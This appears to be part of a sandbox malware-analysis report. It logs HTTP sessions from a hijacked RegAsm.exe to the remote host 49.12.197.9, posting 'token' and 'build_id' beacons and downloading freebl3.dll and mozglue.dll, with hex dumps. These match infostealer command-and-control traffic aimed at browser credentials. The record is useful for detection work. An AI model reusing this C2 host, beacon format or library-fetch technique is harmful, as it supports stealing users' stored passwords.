                                                                                                                                                                                                                                          2024-10-02 12:43:33 UTC16384INDELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count(*) FROM %Q.'%q_%s'tokencharsseparatorsL* N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED]
                                                                                                                                                                                                                                          r:Y<|=>MbP?|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED]
                                                                                                                                                                                                                                          i"
                                                                                                                                                                                                                                          i"$i"0i"8i"Di"Pi"\i"hi"
                                                                                                                                                                                                                                          xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"*n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED]
                                                                                                                                                                                                                                          9/I?hKd?81UH!G?#$0|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?*llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!*87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED]
                                                                                                                                                                                                                                          !5ACPRSWYlm pr

                                                                                                                                                                                                                                          )Y*"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          29192.168.2.65854549.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:33 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKE
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 829
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:33 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------FHCBGDAAFBKEBGDHDBKECont
                                                                                                                                                                                                                                          2024-10-02 12:43:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:34 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          30192.168.2.65854649.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:35 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJ
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 437
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:35 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HIJJDGDHDGDAKFIECFIJCont
                                                                                                                                                                                                                                          2024-10-02 12:43:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:35 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          31192.168.2.65854749.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:36 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 437
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:36 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------GHJDBAKEHDHDGCAKKJJECont
                                                                                                                                                                                                                                          2024-10-02 12:43:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:36 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          32192.168.2.65854849.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:37 UTC195OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:37 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 685392
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:43:37 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: 0c ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff
                                                                                                                                                                                                                                          Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: f2 c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18
                                                                                                                                                                                                                                          Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: 8b 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01
                                                                                                                                                                                                                                          Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: ee 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac
                                                                                                                                                                                                                                          Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9
                                                                                                                                                                                                                                          Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00
                                                                                                                                                                                                                                          Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff
                                                                                                                                                                                                                                          Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98
                                                                                                                                                                                                                                          Data Ascii: w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                                                                                          2024-10-02 12:43:38 UTC16384INData Raw: e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01
                                                                                                                                                                                                                                          Data Ascii: ,0<48%8A)$


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          33192.168.2.65854949.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:39 UTC195OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:39 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:39 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 608080
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:43:39 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
